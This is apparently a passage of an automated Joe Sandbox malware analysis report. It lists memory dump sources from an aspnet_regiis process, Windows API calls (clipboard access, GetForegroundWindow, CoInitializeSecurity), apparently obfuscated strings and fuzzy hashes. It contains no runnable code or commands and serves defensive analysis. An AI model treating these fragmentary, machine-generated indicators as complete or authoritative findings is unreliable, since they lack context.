                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                              • Opcode ID: 845b6927e26f67012d5a0918a562faa1fc9e0597bfbaef7634a59e952ace598e
                                                                                                                                                                                                              • Instruction ID: 962367ebf9f47c9d3979d4e0aeb522cd70ca9cfb6fa852a9830ef2db9eb348f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 845b6927e26f67012d5a0918a562faa1fc9e0597bfbaef7634a59e952ace598e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BF0EC302452429FE7018B32CC207543B22EB86308F3880A8D0140AAE2C6364823D650
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                              • Opcode ID: 8132e01d426777e164535de86287d2308e04b360256df3d089c7f88aa0ed51cf
                                                                                                                                                                                                              • Instruction ID: 3adaaea824136dff36d7526087916a83c478de59299ea7453f48a90c0b615d21
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8132e01d426777e164535de86287d2308e04b360256df3d089c7f88aa0ed51cf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57F074755093429FE324DF29C1A875BBBE1BB88304F11891DE4999B390CBB99949CFC2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                              • Opcode ID: 3859195e36529fbaef24b57da194b0f8a2dfaf26acc88133e1991387fb91b625
                                                                                                                                                                                                              • Instruction ID: d950314afddff776daf5becc641d9367e909963a77c8c50fa599080cd4375b31
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3859195e36529fbaef24b57da194b0f8a2dfaf26acc88133e1991387fb91b625
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CEF0B2B16083028FE304CF25C1A830BBBE5AF84308F21880CD0A50B380C7BAA6498F82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 77098DEB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                              • Opcode ID: c8d77618245ec073f58971acfe50834a06a78affad5c321cb2682e5d63cbc133
                                                                                                                                                                                                              • Instruction ID: a388ef1a4fda71c8a731ebe160047227a75187356461cb04f412b18f7a5057e6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8d77618245ec073f58971acfe50834a06a78affad5c321cb2682e5d63cbc133
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9D0127BB512009FEA044939DD4729637D3D396256B1A4424D042D274CD93C99458A46
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 7706D716
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                              • Opcode ID: 3b38985f0c61d2949ec48e5dba46f98d38f2ff0fecd1cf663aceae329d3a169b
                                                                                                                                                                                                              • Instruction ID: 9233831ec0d298761afc2a823af2a8c7530e2b34e37c2ac0c6300b47684df822
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b38985f0c61d2949ec48e5dba46f98d38f2ff0fecd1cf663aceae329d3a169b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7D092323D52027EF6644A298C53F1037916745B25F320A28B362FE2C0C9E472628A18
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                              • String ID: @$O$Q$R$T
                                                                                                                                                                                                              • API String ID: 2832541153-3006032178
                                                                                                                                                                                                              • Opcode ID: 5e87675acdb9a7f3bbcb402c9bdb89c266b4ae36515bd4dae601efc9eb7bf534
                                                                                                                                                                                                              • Instruction ID: 473e71294c898bbdd95aa9b198209c6be9a42bcdb57dc1235951fce72e34c101
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e87675acdb9a7f3bbcb402c9bdb89c266b4ae36515bd4dae601efc9eb7bf534
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F751F4B2C083958FDB01ABB8994839EBFF0AB19214F054639D4D4E73C6D3798555CBA3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: O?A$O?A$-[Z]$-[Z]$1C?E$1C?E$5K&M$5K&M$?G!Y$?G!Y$E7DI$E7DI
                                                                                                                                                                                                              • API String ID: 0-921845939
                                                                                                                                                                                                              • Opcode ID: e75df8cc0c31b2944aebc3b8c218e5c9cd6edeb75e6fdea09adba17b328b8066
                                                                                                                                                                                                              • Instruction ID: 25f2222fa715c14abf89684f854deccb1653c74541c849f7d1e21a40be96f5a4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e75df8cc0c31b2944aebc3b8c218e5c9cd6edeb75e6fdea09adba17b328b8066
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA1214B25193408BD7088F29C85226FBBE2FFD5714F199A6CE4D69B390D7388905CB87
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: '<$!$(4;9$:15H$B8$)$IEKL$J)$OMAL$WEIG$X$hlZn$zqCy$'(
                                                                                                                                                                                                              • API String ID: 0-4049670026
                                                                                                                                                                                                              • Opcode ID: f8f095efae4f67691b030b1f2f80a5f0fb16907d71b72cf9df7f0d28195c7510
                                                                                                                                                                                                              • Instruction ID: b0ba2645457dd57350be9af1bd64b23bf00a72f3a7740c1e5e2e90b9d91b2f52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8f095efae4f67691b030b1f2f80a5f0fb16907d71b72cf9df7f0d28195c7510
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38C1297151C3D18BD312CF3988A036BFFE1AF93A54F0949ACE4D59B652D339850ACB92
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: #B{{$()$;Edx$Aqro$T!$afdx$mfgs$o3jg$|~}x$~pv~
                                                                                                                                                                                                              • API String ID: 0-3716388412
                                                                                                                                                                                                              • Opcode ID: 00364b23a071c3a187feb6d747a54b1b6cc23501b68df9fc2e3cf8f250a246c1
                                                                                                                                                                                                              • Instruction ID: fd9d006a0d80c8ae75b45fee85408cf4b170b38f0c024a34d9808382e11fff4d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00364b23a071c3a187feb6d747a54b1b6cc23501b68df9fc2e3cf8f250a246c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 533223726083028FD714CF28C8916ABB7F2FF95B50F19892CD4D687395EB34A546CB92
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: ()$BwOy$DsIu$HF$IE$J{A}$Wk^m$ZM$^oUq
                                                                                                                                                                                                              • API String ID: 0-143798822
                                                                                                                                                                                                              • Opcode ID: cd3d42654d6abecacea94f8383a536b6d775ca9cfdb3141ecb0054024493dd28
                                                                                                                                                                                                              • Instruction ID: 2b4e26b22de6f416989e2de678346fb7d30c3c5bb2999fea3edfac23314f7c0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd3d42654d6abecacea94f8383a536b6d775ca9cfdb3141ecb0054024493dd28
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6C1D2B11083048BDB18DF24C862B6BB7F2FF92754F15895CE5D28B3A0E7799904CB96
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 0M#O$<A#C$HI$K=]?$T1f3$Y9N;
                                                                                                                                                                                                              • API String ID: 0-1709872780
                                                                                                                                                                                                              • Opcode ID: 2c55b1f9691db0db9bb145d458399ddd0f35e2b5438cfc347590e0e049478c91
                                                                                                                                                                                                              • Instruction ID: 516461f114c846ed4048947e306baa72ddce2a1c5a724ad10d15648347d8db2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c55b1f9691db0db9bb145d458399ddd0f35e2b5438cfc347590e0e049478c91
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6431ABB08083018ED705CF54D8A1667B7F2FF92B14F215A4CE5A24F2A1F379D645CB9A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: -$2^G($6J1.$EZL+$Y?5<$]:*3
                                                                                                                                                                                                              • API String ID: 0-1602931408
                                                                                                                                                                                                              • Opcode ID: f3ecc4faef5fc35122233bf399ad68d3ee5f9ccff34aa32c0b03cf12c0b28c59
                                                                                                                                                                                                              • Instruction ID: e89fc06efd4e29e7861d819c20c997eff6bd7a97f2912547bce001a4cf6c8b64
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3ecc4faef5fc35122233bf399ad68d3ee5f9ccff34aa32c0b03cf12c0b28c59
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD1149719187908FE314CF69844075BBBF1ABC6715F55891DE1E09F295D638D805CF42
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: DGEA$InA>$InA>$f
                                                                                                                                                                                                              • API String ID: 0-2944314582
                                                                                                                                                                                                              • Opcode ID: 01277bb499529912c4897d2cfdf38018de0535dfac991dcfdeadd6f681620229
                                                                                                                                                                                                              • Instruction ID: 9282220f914922bbd7c1ef3c0f29079b3720ac776c97ea05d98b1641313d5d7d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01277bb499529912c4897d2cfdf38018de0535dfac991dcfdeadd6f681620229
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F42DD756093419FC305CF28C990B6ABBF2ABC9718F188A3DE4A687391D734D805DF96
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: H7q1$M'M!$V#K-$Y+X5
                                                                                                                                                                                                              • API String ID: 0-1016449573
                                                                                                                                                                                                              • Opcode ID: 897665b47b42a3c986229c89ca5cd586c82241a064e83fe5335e59186cb0e555
                                                                                                                                                                                                              • Instruction ID: 76a185f43fd9e006f5e945f030b25b393425b702e2fd86b840e3eb56f960bd31
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 897665b47b42a3c986229c89ca5cd586c82241a064e83fe5335e59186cb0e555
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2932EA75201B018FE725CF25C991B62B7F2FF85710F2A856CE4878B766C779A841CB90
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: InA>$[+*)$l
                                                                                                                                                                                                              • API String ID: 0-4132958464
                                                                                                                                                                                                              • Opcode ID: d9fc734b302ebbf2f953a03af4a49711e93abadd2b83a7cf99dc66e494a0244f
                                                                                                                                                                                                              • Instruction ID: 097974a7d0ebc8dd8f1ab96fe65c8bf7721b36ba78b97c62f55a1b2ff2d9c679
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9fc734b302ebbf2f953a03af4a49711e93abadd2b83a7cf99dc66e494a0244f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 293205716083554FD319CE28C89135FBBE2EBC5714F15C92CE8EA9B381D775C8069B86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $=!*$-J/H$DB
                                                                                                                                                                                                              • API String ID: 0-4012138552
                                                                                                                                                                                                              • Opcode ID: b300b01e7b02623624bdf45046da52802295aa1b9441f133b760dc93bd243e27
                                                                                                                                                                                                              • Instruction ID: e7d5d51166f241e6486042fe5ff2f8c8967ba9ff3198fe5c0b5dffe09e3556f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b300b01e7b02623624bdf45046da52802295aa1b9441f133b760dc93bd243e27
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97A13671608B808FE325CB3684A47A3FBE3AF86615F19895DC1EB8B785D779A005CB11
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $=!*$-J/H$DB
                                                                                                                                                                                                              • API String ID: 0-4012138552
                                                                                                                                                                                                              • Opcode ID: b2a7cdfc40f674c72ef0aaa8f96af839bf077ea0ac3016605db2ec3ef200bb33
                                                                                                                                                                                                              • Instruction ID: fdad590adbb0f3b5012b34d932aec0d70b78d0a575bfdb7700b33d94908f081a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2a7cdfc40f674c72ef0aaa8f96af839bf077ea0ac3016605db2ec3ef200bb33
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57812871608B808FE325CF3684A47A3FBE3AF96615F19899CC1E74B385D7796005CB12
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: LL
                                                                                                                                                                                                              • API String ID: 0-1220722286
                                                                                                                                                                                                              • Opcode ID: 950bd229746c298f1f0ab446a6786d67fe25c5eea1a5478109dc20dbf40d2743
                                                                                                                                                                                                              • Instruction ID: 5243afe9c8410728ad25fdd1c2182deda550cf6bbbe2f1daecfdd92cc505622f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 950bd229746c298f1f0ab446a6786d67fe25c5eea1a5478109dc20dbf40d2743
